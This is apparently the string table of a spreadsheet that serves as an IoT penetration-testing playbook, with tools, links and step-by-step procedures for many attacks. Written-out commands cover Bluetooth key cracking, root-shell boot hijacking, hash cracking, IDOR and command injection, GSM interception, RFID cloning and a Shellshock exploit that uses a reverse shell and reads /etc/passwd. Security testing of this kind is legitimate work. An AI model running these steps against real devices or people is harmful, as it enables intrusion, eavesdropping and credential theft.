    <t>Deobfuscate obfuscated firmware</t>
  </si>
  <si>
    <t>Use bootloading functions to understand booting mechanism and thereby use this knowledge to deobfuscate the firmware</t>
  </si>
  <si>
    <t>http://www.devttys0.com/2014/02/reversing-the-wrt120n-firmware-obfuscation/</t>
  </si>
  <si>
    <t>IDA Pro</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>Sniff and decrypt messages</t>
  </si>
  <si>
    <t>Replay messages</t>
  </si>
  <si>
    <t>Ubertooth</t>
  </si>
  <si>
    <t>ubertooth-btle
ubertooth-scan
crackle</t>
  </si>
  <si>
    <t>Sniff, decrypt</t>
  </si>
  <si>
    <t>Scan and store data in pcap file. Then find long term key (LTK) using crackle. Decrypt pcap file using crackle with the LTK found:
1. hcitool scan
2. ubertooth-btle –p –f -c capture.pcap (Promiscuous mode - All Traffic is collected) (or ubertooth-scan -s)
3. ubertooth-btle –a &lt;MAC Address&gt; (For specific device)
4. crackle -i ltk_exchange.pcap -o decrypted.pcap (Cracking pairing key)
Output: LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
5. crackle -i encrypted_known_ltk.pcap -o decrypted2.pcap -l &lt;LTK, eg. 7f62c053f104a5bbe68b1d896a2ed49c&gt; (Decrypting packets)
This method may be used to retrieve API keys, passwords, etc. that is being transmitted between devices</t>
  </si>
  <si>
    <t>https://www.security-sleuth.com/sleuth-blog/2015/9/6/now-i-wanna-sniff-some-bluetooth-sniffing-and-cracking-bluetooth-with-the-ubertoothone
https://penturalabs.wordpress.com/2013/09/01/ubertooth-open-source-bluetooth-sniffing/
http://blog.cozybit.com/how-to-crack-bluetooth-le-security-using-crackle/
https://github.com/mikeryan/crackle</t>
  </si>
  <si>
    <t>Not possible at the moment</t>
  </si>
  <si>
    <t>https://github.com/greatscottgadgets/ubertooth/issues/180</t>
  </si>
  <si>
    <t>ettercap</t>
  </si>
  <si>
    <t>1. Multimeter
2. Chemicals (Ristoff C-8 and Magnastrip 500, etc.
3. Dremel wheel
4. Fiber glass</t>
  </si>
  <si>
    <t xml:space="preserve">1. Trace the bus lines from individual pins of the processor (eg. JTAG pins, UART pins, etc.) to the corresponding pins in the board (eg. JTAG headers/pins, UART headers/pins)
2. If unable to trace, perform conductivity test using Multimeter probes set on conductivity mode. Touch one probe of multimeter to the processor pin to be tested and second probe of multimeter to pin/header of board. If sound comes, these two points will be connected together in the board.
3. PCB tracing may be done by removing the solder layer using various methods:
a. Using sandpaper
b. Using dremel wheel
c. Fiber glass
d. Using chemicals such as Ristoff C-8 and Magnastrip 500 (or other chemicals containing methlyene chloride) to uncover bus lines
</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=oyedFq1VAjg
http://www.grandideastudio.com/pcbdt/
http://www.grandideastudio.com/wp-content/uploads/pcb_deconstruction_techniques_slides.pdf
https://www.usenix.org/system/files/conference/woot14/woot14-grand.pdf
https://www.youtube.com/watch?v=4perVGwW3_Y
https://www.youtube.com/watch?v=C6Yrv-hOucM
https://www.youtube.com/watch?v=LqiOdfVidlU</t>
  </si>
  <si>
    <t>Hijacking kernel init using malicious boot script</t>
  </si>
  <si>
    <t>Create malicious boot script in a pendrive to make the device boot using script in pendrive.
For example, as seen for one IoT device:
1. Connect a USB-To-TTL adapter to the device
2. Format a USB drive to the "FAT32" format
3. Add the following output to a file named FS.sys.txt
setenv cmdline "&lt;init mem commands&gt; init=/bin/sh"
4. run bootcmd
5. Compile the FS.sys.txt file with the following command.
mkimage -A arm -T script -d fs.sys.txt fs.sys
6. Copy the fs.sys file to the root of the FAT32 formatted USB drive.
7. nsert the USB drive into the Vizio CoStar LT.
8. Restart the device by unplugging and re-plugging in the power adapter.
9. After the kernel boots it will drop your UART connection to a root shell.
(Here the device checks for FS.sys u-boot script file in pendrive during every boot). Modifying the FS.sys enables us to obtain root shell by booting through pendrive</t>
  </si>
  <si>
    <t>1. Analyze the extracted firmware to obtain keys, configuration files, commands, passwords, etc. 
a. Useful items may be found in following locations:
i. The commands may be found in /bin/, /sbin/, /usr/bin/, /usr/sbin/, /usr/local/bin/, /usr/local/sbin/
ii. Libraries used may be found in /lib/, /usr/lib/, /usr/local/lib/, /var/lib/
iii. Password files are stored in /etc/passwd and /etc/shadow/
iv. Initialization scripts (Bootloading) are found in /etc/init.d/ (rcS is in /etc/init.d/rcS)
v. Web server scripts may be in /home/www/
b. grep (grep -rnHi &lt;search_term&gt; /) for:
i. Items such as "config", "password", "passwd", "login", "user", ".pem", ".crt", ".bin", etc
ii. Files with ".cfg" extension, without extension, etc.
iii. Binaries such as ssh, tftp, dropbear, etc.
2. Use static and dynamic firmware analysis tools such as firmwalker, firmadyne or static-firmware-analysis to find important patterns, files, common vulnerabilities, etc. in the firmware</t>
  </si>
  <si>
    <t>1. Obtain the application binary (say application.exe) from online download, installation CD, etc.
2. Use 'file' command to understand the type of file: file application.exe
3. Perform strings (or hexdump -C) on the binary to see all cleartext strings in the binary:
strings (or hexdump -C) application.exe
4. Analyze firmware using binwalk to find further information about the file:
binwalk application.exe
5. Disassemble (use radare2, IDA, Hopper, etc.)/decompile (use dotPeek, dex2jar, etc.) the binary to obtain the assembly level/high level code
6. Obtain hardcoded passwords, keys, commands and find any vulnerable algorithms used in the assembly/ high level code</t>
  </si>
  <si>
    <t>Find vulnerabilities in the code flow, algorithm, etc. by analyzing the assembly code/ high level code.
Stack buffer overflow:
1. Emulate and debug device firmware in laptop using tools such as gdb or gdb-multiarch
2. Find any vulnerable functions in the application binary that may be used to execute critical commands.
3. Enter a large string as input
4. If segmentation fault occurs, find the value of instruction pointer (program counter). (This will mean that buffer overflow might be possible) 
5. Modify the string input to point the return address (last characters of string) to the required function in the firmware, which will allow for execution of system commands.
Command injection:
1. During normal operation of the application, enter system commands (eg. ls, echo test), etc. in input fields (eg. in the username/password/phone number entry) to check if commands get executed</t>
  </si>
  <si>
    <t>Burp Suite</t>
  </si>
  <si>
    <t>Use a proxy server such as Burp Suite to intercept the traffic between the client and the cloud. The API calls and responses may be recorded, modified and sent either to the cloud or to the device. 
1. Data flowing through such API calls and responses may leak sensitive information such as user credentials. 
2. Tweaking the parameters in the API calls may be done to raise the API request on behalf of another user (IDOR) and for multiple requests (leading to DDoS)</t>
  </si>
  <si>
    <t>https://blog.securelayer7.net/api-penetration-testing-with-owasp-2017-test-cases/
https://www.owasp.org/index.php/OWASP_API_Security_Project
https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html</t>
  </si>
  <si>
    <t>1. Find all open ports and services running on the device: nmap -p1-65535 -sV -sS -Pn &lt;IP&gt;
2. Check online for any vulnerabilities on the services running on the device based on the version (cve.mitre.org).
3. Use publicly available exploits on the services, eg. using metasploit modules for the specific exploit</t>
  </si>
  <si>
    <t>nmap
Metasploit</t>
  </si>
  <si>
    <t>Crack hashes obtained from any services or configuration files using password wordlist or through pure brute force. This may be performed using tools such as John the Ripper and Hashcat.
1. John: 
Dictionary attack: john --wordlist=password_list.txt target_hashes.txt
Bruteforce: john --incremental target_hashes.txt (command never ends)
Rules can be enabled for word mangling (eg. john --rules --wordlist=password_list.txt target_hashes.txt
2. Hashcat:
hashcat -m &lt;hash type number, eg. 0&gt; -a &lt;cracking type, eg. 0 (for dictionary attack) -o cracked.txt target_hashes.txt /path/to/password_wordlist.txt</t>
  </si>
  <si>
    <t>john
hashcat</t>
  </si>
  <si>
    <t>https://www.tunnelsup.com/getting-started-cracking-password-hashes/
https://resources.infosecinstitute.com/hashcat-tutorial-beginners/#gref</t>
  </si>
  <si>
    <t>Brute-forcing PINs/ passwords offline using hashes/encrypted data</t>
  </si>
  <si>
    <t>Rooting device using su binary and SuperSU apk</t>
  </si>
  <si>
    <t>Firmare binaries</t>
  </si>
  <si>
    <t>Rooting through addition of privileged binaries/ APKs</t>
  </si>
  <si>
    <t>USB-UART adapter
Bus Pirate</t>
  </si>
  <si>
    <t>screen or
minicom or
putty</t>
  </si>
  <si>
    <t>https://www.exploitee.rs/index.php/Hisense_Android_TV
https://www.exploitee.rs/index.php/Amazon_FireTV
https://forum.exploitee.rs/viewtopic.php?t=1642</t>
  </si>
  <si>
    <t>Copy over the SuperSU APK into app, and the su binary to bin (http://www.cydiaimpactor.com/ can help with copying su). Ensure that you properly chown the su binary (4755 used in the reference blogs). This will allow for root access via ADB. Additionally, SuperSU can be used in the device to give root privileges to applications that require it.
SuperSU is a 'superuser' privilege administration tool that allows you to administer the privileges enjoyed by all of the apps you have installed. Basically, it gives you total control over your Android device.
Root checker pro app may be used to check the user's root access on the device</t>
  </si>
  <si>
    <t>Sniff radio signals</t>
  </si>
  <si>
    <t>Replay radio signals</t>
  </si>
  <si>
    <t>Sniff radio signals and decode messages</t>
  </si>
  <si>
    <t>Replay radio signals captured by sniffing</t>
  </si>
  <si>
    <t>RTL-SDR</t>
  </si>
  <si>
    <t>gqrx
rtl_433
gnuradio-companion
Audacity
Universal Radio Hacker
SigDigger</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=uIVBVd6yi_A</t>
  </si>
  <si>
    <t>HackRF One or
Yardstick One or
433MHz Tx module with Arduino</t>
  </si>
  <si>
    <t>Universal Radio Hacker
SigDigger</t>
  </si>
  <si>
    <t>1. Connect HackRF One to the laptop
2. Run radio analysis tools such as Universal Radio Hacker
3. Press the remote/key fob button to control the device. The signal from the remote will be captured by the radio analysis tool
4. Demodulate and decode the signal if necessary (Specifying the right levels for 1 and 0) - based on type of modulation and encoding
5. Replay the same signal through HackRF One. If done correctly, the device will respond to the signal transmitted by HackRF One.</t>
  </si>
  <si>
    <t>https://medium.com/@shreyasubale/reverse-engineering-a-wireless-doorbell-and-performing-a-replay-attack-part1-23d59d57ce82
https://www.youtube.com/watch?v=uIVBVd6yi_A
https://www.youtube.com/watch?v=hZHlinV_6mY</t>
  </si>
  <si>
    <t>1. Connect RTL-SDR to the laptop
2. Run gqrx to see the signals (mostly on 315Mhz, 433Mhz and 915mhz)
3. Capture the signals at specific frequency: rtl_433 -S all -f &lt;frequency, eg. 433.83M (obtained from gqrx)&gt; -a (-a flag decodes the signal). This will save the signals into a file &lt;gxxx.cu8&gt;. Decoding of the signals may be perormed using -a flag in rtl_433 or using other tools available
4. Analyze the file in an audio analysis tool such as Audacity. Additionally, tools such as Universal Radio hacker and SigDigger may be used to decode and demodulate the signals (as required based on modulation and encoding of signal) to get the binary data out of the radio signals
5. Retrieve API keys, passwords from the data obtained from the signal analyzed in Audacity or from that obtained from tools such as rtl_433, Universal Radio Hacker and SigDigger</t>
  </si>
  <si>
    <t>Sniffing SMS messages</t>
  </si>
  <si>
    <t>Sniff</t>
  </si>
  <si>
    <t xml:space="preserve">Replay SMS messages </t>
  </si>
  <si>
    <t>Send the SMS messages either through:
1. Mobile phone directly to the specific server or
2. Using Man in the middle setup to replay the messages</t>
  </si>
  <si>
    <t>Mobile phone</t>
  </si>
  <si>
    <t>https://ferrancasanovas.wordpress.com/cracking-and-sniffing-gsm-with-rtl-sdr-concept/
https://osmocom.org/projects/security/wiki/A5_GSM_AT_tricks
https://ferrancasanovas.wordpress.com/2014/01/28/get-kc-key-and-tmsi-number/
https://domonkos.tomcsanyi.net/?p=369
https://www.youtube.com/watch?v=Nvf_QBez8w0
https://www.youtube.com/watch?v=IuxBfHnP5S0
https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/</t>
  </si>
  <si>
    <t>RTL-SDR or
HackRF One
bladeRF x40
2 Quad-band Cellular Duck Antennas SMA.
Raspberry Pi 3
A microsd for the RPI &gt;= 8GB.</t>
  </si>
  <si>
    <t>gqrx
kal
rtl_sdr
airprobe
PuTTY or
HyperTerminal or
minicom or
screen
Wireshark
yate
yatebts</t>
  </si>
  <si>
    <t>https://support.portswigger.net/customer/portal/articles/1964020-using-burp-to-brute-force-a-login-page</t>
  </si>
  <si>
    <t>1. Create proxy server using Burp Suite
2. Intercept one request containing login data in Burp
3. Send the request to 'Intruder' tool in Burp
4. Parameterize the username/ password field (whichever is being brute forced)
5. Select payload type (eg. simple list)
6. Select number of threads and time duration between requests (in order to prevent account lockout)
7. Enter the wordlist (or use pure brute force) and start the attack</t>
  </si>
  <si>
    <t>dex2jar
apktool
jd-gui</t>
  </si>
  <si>
    <t>qark
mobSF</t>
  </si>
  <si>
    <t>https://stackoverflow.com/questions/12732882/reverse-engineering-from-an-apk-file-to-a-project
https://github.com/OWASP/owasp-mstg/blob/master/Document/0x06c-Reverse-Engineering-and-Tampering.md</t>
  </si>
  <si>
    <t>Perform static code analysis using open source tools such as QARK, MobSF, etc. to find vulnerabilities in the code (eg. Embedded private keys, cryptography issues, etc.)</t>
  </si>
  <si>
    <t>1. Create proxy server using Burp Suite
2. Intercept one request that is to be replayed
3. Send the request to 'Repeater' tool in Burp
4. Send the request using Repeater and check if the request sent is accepted by the server (or device)
5. If the request is accepted by the server (or device), the request can be stored locally and python/ curl script may be used to send the request locally without the use of Burp.
6. If the request is not accepted by the server (or device), check if any parameter needs to be modified for allowing replay attacks to be possible (eg. using the right token for the request). Algorithms/ keys used with the request sent may be stored locally and python/ curl may be used to send the request to the server/ device using the request along with the algorithm/ key.</t>
  </si>
  <si>
    <t>https://portswigger.net/burp/documentation/desktop/tools/repeater/using
https://blog.secureideas.com/2016/08/burp-repeater.html</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)
https://www.owasp.org/index.php/Broken_Access_Control
https://www.owasp.org/index.php/Forced_browsing
https://www.owasp.org/index.php/Path_Traversal
https://breakdev.org/sniping-insecure-cookies-with-xss/</t>
  </si>
  <si>
    <t>Escalate privileges from normal to admin users using methods such as IDOR, Broken Access Control, etc.
IDOR:
1. Log in as normal user
2. Analyze the application to find input parameters (eg. 'Id', 'username', etc.)
3. Change the value of the parameter to admin level parameters (eg. id=0, username=admin)
4. Check if changing the value of the parameter leads to changing the session to an admin session
Broken Access Control:
1. Log in as normal user
2. Try to access critical pages (such as Upload Firmware, Password Change, etc.) by force browsing (entering the URL in the web browser directly), path traversal (using =../../path/to/page), etc.
3. Check if performing the above step allows normal user to access these critical pages
Session cookies
1. Log in as normal user
2. Find session cookies of admin in various locations such as requests/ responses or using XSS (Using Burp as a proxy server will help in this case)
3. Log in as admin using the session cookies obtained from step 1</t>
  </si>
  <si>
    <t>Modify parameters in the request of the device or response of the server to execute commands or obtain sensitive information of other users (IDOR)
1. Create a proxy server using Burp Suite
2. Send a request using the device or phone and intercept using Burp
3. Change the value of any parameter in the request to change the ID of the user raising the request or to change the command to be executed. 
If the response is being changed, then the response can be changed to TRUE instead of FALSE or vice versa, just before the response from the server reaches the device. This will enable us to perform arbitrary privileged commands in the device even when the server has denied the request.
4. If data is being obtained for other users (eg. for different VIN for cars), we will be able to brute force the numbers of the ID/ VIN to obtain data (eg. car speed, temperature, etc.) from all users using the application.</t>
  </si>
  <si>
    <t>https://www.troyhunt.com/controlling-vehicle-features-of-nissan/</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/Web_Application_Security_Guidance
https://www.owasp.org/images/4/42/OWASP_Web_Application_Security_Quick_Reference_Guide_0.2.pdf
https://github.com/0xRadi/OWASP-Web-Checklist/blob/master/OWASP/OWASP%20Web%20Application%20Security%20Testing%20Checklist.pdf</t>
  </si>
  <si>
    <t>Test for OWASP Top 10 using the checklists/ reference guides provided by OWASP (Using Burp as a proxy server will help in this regard)</t>
  </si>
  <si>
    <t>Code execution</t>
  </si>
  <si>
    <t>Modify parameters to include code that will be executed</t>
  </si>
  <si>
    <t>Modify parameters in the request of the device or response of the server to execute commands in the device or at the server:
1. Create a proxy server using Burp Suite
2. Send a request using the device or phone and intercept using Burp
3. Change the value of any parameter in the request to change the parameter to add commands such as "; ls", "cat /etc/passwd", etc. to check for code execution. Additionally, SQL Injection may also be tested to check if SQL queries may be executed. This will enable us to gain sensitive information such as usernames and passwords and also to modify existing SQL data values
4. If code execution exists, the remote device or server may be controlled either partially or fully by the user</t>
  </si>
  <si>
    <t>https://support.portswigger.net/customer/en/portal/articles/2590642-using-burp-to-test-for-code-injection-vulnerabilities
https://support.portswigger.net/customer/portal/articles/2590661-using-burp-to-test-for-os-command-injection-vulnerabilities
https://support.portswigger.net/customer/portal/articles/1965677-using-burp-to-detect-sql-injection-flaws
https://www.exploit-db.com/docs/33253
https://security.stackexchange.com/questions/95364/how-to-perform-sql-insert-or-update-command-using-sql-injection</t>
  </si>
  <si>
    <t>adb</t>
  </si>
  <si>
    <t>1. Connect to mobile/ device using laptop (Enable USB debugging in phone/ device)
2. Execute following command: adb logcat
3. Inspect log for sensitive data such as passwords, encryption keys, commands executed, etc.</t>
  </si>
  <si>
    <t>https://support.citrix.com/article/CTX232375
https://developer.android.com/studio/command-line/logcat</t>
  </si>
  <si>
    <t>ippsec.rocks</t>
  </si>
  <si>
    <t>MobSF
Drozer
Nessus
Sparta
dirbuster/ gobuster
wfuzz
sqlmap
nmap</t>
  </si>
  <si>
    <t>Use tools such as MobSF, Drozer, Nessus, Sparta, etc. for dynamic analysis
Additionally, tools such as dirbuster/ gobuster, wfuzz, sqlmap, nmap, etc. may be used for testing specific vulnerabilities</t>
  </si>
  <si>
    <t>https://medium.com/bugbountywriteup/how-i-bypassed-the-otp-verification-process-part-2-c69f067216d</t>
  </si>
  <si>
    <t>Use flaws in forgot password functionality such as:
1. Brute forcing the OTP if OTP is sent when forgot password was requested
2. Entering the previous password if previous password is available to the attacker
3. Concatenating the attacker's email ID/ Phone number in addition to the actual user's mail ID when requesting for Email ID/ Phone number for forgot password</t>
  </si>
  <si>
    <t>Burp Suite
Postman
curl</t>
  </si>
  <si>
    <t>https://www.testbytes.net/blog/api-security-testing-rules-and-checklist/</t>
  </si>
  <si>
    <t>1. Use Burp Suite to intercept the API requests and responses from/ to the device
2. Fuzz the parameters in the API to check how the device/ server responds to each value in the parameter
3. Change IP/ host in the request/ response to divert the requests/ responses to attacker's machine
4. Brute forcing API commands to find hidden commands used in the API calls
5. Performing IDOR by changing the ID values to different users' values
6. Performing directory traversal by requesting files/ directories that are not meant to be called while raising the API request (eg. /etc/passwd)
7. Finding hidden passwords/ secrets, personally identifiable information (PII, eg. credit card numbers, UID numbers, etc.) in the API requests and responses
8. Perform code execution (or SQL Injection) in API by adding OS/ system commands (eg. using XXE)</t>
  </si>
  <si>
    <t>Perform static/ dynamic analysis</t>
  </si>
  <si>
    <t>1. Use tools such as SOUP UI, Katalon studio, Postman, etc. to perform static/ dynamic analysis of APK</t>
  </si>
  <si>
    <t>SOUP UI
Katalon studio
Postman
Jmeter
RestAssured
CloudQA TruAPI</t>
  </si>
  <si>
    <t>https://www.qasymphony.com/blog/automated-api-testing-tutorial/
https://dzone.com/articles/api-testing-and-automation-101-the-essential-guide</t>
  </si>
  <si>
    <t>Shellshock vulnerability</t>
  </si>
  <si>
    <t>Run vulnerability scan (eg. Nessus) to test for Shellshock</t>
  </si>
  <si>
    <t>https://null-byte.wonderhowto.com/how-to/exploit-shellshock-web-server-using-metasploit-0186084/</t>
  </si>
  <si>
    <t>1. Perform shellshock vulnerability scan on device IP using vulnerability analysis tool such as Nessus or Metasploit
2. If Shellshock vulnerability exists, execute the following command to perform the exploit:
i. Add hello.sh to cgi-bin (eg. by uploading file or by using PUT/POST commands):
sudo nano payload.sh
    #! /bin/bash
    echo "Content-type: text/html"
    echo ""
    echo "Hello world!"
chmod 755 payload.sh
ii. Exploit shellshock vulnerability:
Using metasploit:
    msfconsole
    use exploit/multi/http/apache_mod_cgi_bash_env_exec
    set rhost &lt;Target_Device_IP&gt;
    set targeturi /cgi-bin/payload.sh
    set payload linux/x86/shell/reverse_tcp
    exploit
Using curl:
curl -A ‘() { :;}; /bin/bash -c “echo vulnerable”‘ http://Target_Device_IP/cgi-bin/payload.sh (To test)
wget -U “() { test;};echo \”Content-type: text/plain\”; echo; echo; /bin/cat /etc/passwd” http://Target_Device_IP/cgi-bin/payload.sh (To read passwd contents)</t>
  </si>
  <si>
    <t>1. https://research.kudelskisecurity.com/2014/05/01/jtag-debugging-made-easy-with-bus-pirate-and-openocd/
2. https://blog.senr.io/blog/jtag-explained
3. http://dangerousprototypes.com/docs/Bus_Pirate_JTAG_connections_for_OpenOCD
4. https://research.kudelskisecurity.com/2014/05/01/jtag-debugging-made-easy-with-bus-pirate-and-openocd/
5. https://labs.portcullis.co.uk/blog/jtag-on-chip-debugging-extracting-passwords-from-memory/
6. http://openocd.org/doc/html/Debug-Adapter-Configuration.html</t>
  </si>
  <si>
    <t>1. Connect Bus Pirate to JTAG using the following PIN connections (BP-JTAG format): VPU - VTref(3v3) (may not be required), GND - GND, MOSI - TDI, MISO - TDO, CLK - TCK, CS - TMS, AUX - SRST
2. Turn ON device
3. Add following to Buspirate.cfg (change USBx to corresponding Bus Pirate USB interface, eg. USB0): 
a. source [find interface/Buspirate.cfg]
b. interface ftdi
c. ftdi_vid_pid &lt;vendorID&gt; &lt;pID&gt;
d. ftdi_layout_init &lt;data_register&gt; &lt;direction_register&gt;
e. buspirate_vreg 0
f. buspirate_mode open-drain
g. buspirate_pullup 1
h. buspirate_port /dev/ttyUSBx
i. source [find board/&lt;board name, eg. ti_beagleboard&gt;.cfg]
4. Run openocd: sudo openocd -f Buspirate.cfg 
5. Connect to openocd in another terminal: telnet localhost 4444
6. Set breakpoints, step through operation, inspect/inject memory on device</t>
  </si>
  <si>
    <t>Communication Interface - UART</t>
  </si>
  <si>
    <t>On-Board ICs - eMMC</t>
  </si>
  <si>
    <t>Extract firmware from eMMC</t>
  </si>
  <si>
    <t>1. Identify the flash chip (by label, package type, number of connections to processor) and obtain a data sheet if possible;
2. Identify the pins, either by data sheet or oscilloscope. eMMC uses DAT0, CMD and CLK pins, as well as power and ground. CLK is a repetitive signal, while the CMD line has short data bursts, generally preceding data reads/writes on the DAT0 pin.
3. For eMMC: Disable access to eMMC from the processor, and connect pins to a generic SD card and use an SD reader to interface with it;
4. For other flash chips: Use a suitable adapter and programmer to read the chip contents, e.g. the MiniPro TL8663
5. If in-circuit dump is not possible, de-solder the flash chip and perform the dump with a suitable reader.</t>
  </si>
  <si>
    <t>1. eMMC reader (e.g. the MiniPro TL866)
2. SD Card</t>
  </si>
  <si>
    <t>https://www.cs.bham.ac.uk/~tpc/Papers/CARDIS18.pdf
https://www.blackhat.com/docs/us-17/wednesday/us-17-Etemadieh-Hacking-Hardware-With-A-$10-SD-Card-Reader.pdf
https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter
https://www.exploitee.rs/index.php/Interfacing_with_e-MMC_Storage_Devices</t>
  </si>
  <si>
    <t>https://blog.atlasrfidstore.com/rfid-vs-nfc</t>
  </si>
  <si>
    <t>1. Identify RFID card type using Proxmark:
a. Place RFID card over low-frequency antenna
b. Enter command in Proxmark console: lf search
c. Place RFID card over high-frequency antenna
d. Enter command in Proxmark console: hf search
2. Read RFID card data:
Low Frequency cards:
a. Place RFID card (whose data is to be read) over low-frequency antenna
i. EM4100:
Proxmark command: lf em4x em410xdemod 1
In the output, TAG ID is the card number
ii. HID ProxCard
Proxmark command: lf search 
In the output, TAG ID is the card number
High Frequency cards:
a. Place RFID card (whose data is to be read) over high-frequency antenna (all cards, except iClass)
i. MIFARE:
Proxmark command: hf mf chk * ?
Proxmark command: hf mf nested 1 0 A &lt;key found from step 3, eg. ffffffffffff&gt;   d
Proxmark command: hf mf dump 1 (Full dump of data)
Proxmark command: hf mf rdbl &lt;block no., eg.5&gt; A &lt;key found from either of 1st 2 commands, eg. 080808080808&gt; (Read of one block, in the output, 'data' is the block data)
b. iClass
i. Use Windows XP VM to install iclass.exe
ii. Connect Omnikey 5321 RFID card reader to VM
iii. Place RFID card (whose data is to be read) over high-frequency antenna
iv. Enter following command in msys.bat: ./iclass.exe read
v. Data from all tracks (starting fromt track 0) will be obtained
3. Write RFID card data:
Low Frequency cards:
a. Place RFID card (into which data is to be written) over low-frequency antenna
i. EM4100:
Proxmark command: lf em4x em410xwrite &lt;Tag ID, eg.8800180e55&gt; 1  
ii. HID ProxCard
Proxmark command: lf hid clone &lt;TAG ID, eg. 2004263f88&gt;
High Frequency cards:
a. Place RFID card (into which data is to be written) over high-frequency antenna (all cards, except iClass)
i. MIFARE:
Proxmark command: hf mf restore 1 (Full dump)
Proxmark command: hf mf wrbl &lt;block no., eg.5&gt; A &lt;key, eg. 080808080808&gt; 32110000cdeeffff3211000005fa05fa (Write to specific block)
b. iClass
i. Use Windows XP VM to install iclass.exe
ii. Connect Omnikey 5321 RFID card reader to VM
iii. Place RFID card (into which data is to be written) over the front side of the reader
iv. Enter following command in msys.bat: ./iclass.exe write &lt;track number, eg.6&gt; &lt;track data from ./iclass.exe read&gt; (Important note: Do not overwrite track numbers 0-5 as they may brick the card. Track numbers start from 0 and not from 1)
(NFC cards are high frequency RFID cards. The data on NFC cards may also be read and cloned using the same process described above with the help of a high frequency RFID card reader such as Proxmark)</t>
  </si>
  <si>
    <r>
      <t>1. Passive Sniffing:
a. Put phone in GSM only mode - Either from settings of by calling following code: *#*#4636#*#* and changing setting to GSM only
b. Connect RTL-SDR (or HackRF One)
c. Capture the data on the main ARFCN. The main ARFCN for the cell would be the one with the maximum signal strength. kal -s GSM900
d. Identify your service provider’s frequencies and the BTS towers identification numbers. Search online for your country for the particular service provider (eg. Vodafone). After identifing your own service provider frequency range, you have to look for those frequencies in Kalibrate tool that are inside the range of your service provider. These is the frequency range that we will tune in to.
e. Find the service provider's MNC and MCC numbers from http://es.wikipedia.org/wiki/MCC/MNC. MNC and MCC numbers are the ones that identify your service provider’s BTS towers and your country number, respectively. (These numbers can be used to place in a map the BTS towers you are using at a specified moment - http://www.opencellids.org/en/opencellid/cell-location)
f. Connect to the phone (through USB, FBUS etc. - enable USB debugging in phone) and communicate to it serially using terminal programs such as PuTTY, Hyperterminal, etc.
g. Issue AT commands to phone to find TMSI number and Kc</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>AT+CSIM=14,”A0A40000027F20″ (Extracts SRES and Kc)
AT+CSIM=14,”A0A40000026F20″ (Read EF files from SIM card). 
Kc is obtained in above step, eg. +CSIM: 22,”807F65C9C99DD800039000″
AT+CSIM=14,”A0A40000026F7E” (Extracts TMSI)
TMSI is obtained in above step, eg. +CSIM: 34,”0000000B6F7E040011FF14010200009000″
h. Sniff information in the channel :  ./rtl_sdr /tmp/rtl_sdr_capture.bin -s &lt;sampling rate, eg. 1.0e6&gt; -f &lt;frequency, eg. 957e6&gt; -g &lt;gain, eg. 44.5&gt;. Send text message from device (or from phone). Stop the sniffing. This will save the capture as a .bin file.
i</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>. Convert the capture.bin file to capture.grc using gnuradio-companion: Execute command gnuradio-companion
The program will open, go to the tab open file and search the downloaded file named: rtl2832-cfile.grc.
Set the file source to the capture.bin file directory where you have saved it with in the previous step and set the file output for a file called capture.cfile which should be located in the ‘airprobe/gsm-receiver/src/python’ folder. Also, make sure that ‘Repeat’ in the File Source block is set to ‘No’. Now execute the GRC flow graph by clicking on the grey cogs icon. This will create the capture.cfile. The flow chart will not stop by itself when it’s done, so once the file has been written press the red X icon in GRC to stop the flow chart running.
j. Open wireshark and start in lo mode. (Command: wireshark). When a window which is capturing is opened go to the filter box and write gsmtap to see only the GSM frames.
k. Finally use the go.sh tool that comes with airprobe to send the decoded information to wireshark and analyze the frames. 
./go.sh capture.cfile &lt;decimation rate, eg. 64&gt; 0B (Decode signalling frames). With this we will get information about the system and of the calls identification numbers TMSI or IMSI(in few cases).
l. ./go.sh capture.cfile &lt;decimation rate, eg. 64&gt; 0C Kc
2. By creating a base station (BTS) to create a proxy server:
a. Use HackRF One, BladeRF One and Raspberry Pi to create a base station using Yate and YateBTS
b. Enable interception and/ or proxy in the base station to intercept or sniff the data going through the BTS by enabling GSM Tapping
c. Connect phone/ device to the created base station
d. Create requests from the phone/ device and intercept/ sniff them using the Base station
Using the above procedure, we may obtain API keys, passwords and sensitive commands that may be used to control the device</t>
    </r>
  </si>
  <si>
    <t>1. Using MiTM attack to intercept the data between the device and the server, we are able to obtain the firmware when the update is requested. This may be done by:
a. Create a MiTM setup (ARP spoofing, DNS spoofing, etc.) to intercept all data between the device and the server. This has been described in the attack (Sniffing - Sniff data in network)
b. Request a firmware update from the device console. This request must be sent to the cloud server
c. When the firmware update is being obtained by the device the attacker's machine will capture the firmware image before it is received by the device.
d. If this data is captured in Wireshark, the binary data may be consolidated into a normal file and save it. This can then be analyzed using binwalk and then extracted. The important thing to note here is that the magic numbers (file type number) has to be specified correctly at the right locations in the firmware file for binwalk to identify and extract the firmware filesystem
2. Spoofing device ID (eg. MAC ID) to request server for firmware update:
a. Obtain device ID (eg. MAC ID) from device label, using system command, etc.
b. Use ID spoofers such as macchanger to change the ID of the laptop to the device's ID
c. Capture the request sent by the device when requesting for a firmware update (eg. using device logs, Burp, Wireshark, etc.)
d. Replay the request from the laptop using tools such as Python, Burp, etc.</t>
  </si>
  <si>
    <t>1. Android app:
a. Download dex2jar tool from dex2jar.
b. Use the tool to convert the APK file to JAR:
d2j-dex2jar.bat demo.apk
dex2jar demo.apk -&gt; ./demo-dex2jar.jar
